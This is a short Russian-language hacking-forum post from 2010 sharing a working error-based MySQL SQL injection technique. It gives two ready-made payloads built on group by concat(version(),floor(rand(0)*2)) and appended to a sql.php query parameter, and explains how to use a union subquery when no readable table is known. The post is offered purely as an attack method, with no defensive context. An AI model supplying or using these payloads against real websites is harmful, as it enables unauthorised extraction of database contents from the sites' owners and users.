02.01.2010, 05:36
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
С нами:
9296966
Репутация:
585
|
|
Удобно использовать вышеописанный способ Qwazar'a с рэндомом, эксплуатируя сценарии запросами такого вида:
Код:
?sql.php=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
Таблица table здесь - любая доступная для чтения таблица, содержащая более 2х записей, либо можно вписать вместо нее подзапрос с алиасом:
Код:
?sql.php=1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--
А в таблице, с которой читаем инфу, может быть любое число записей.
Последний раз редактировалось cr0w; 03.01.2010 в 21:40..
|
|
|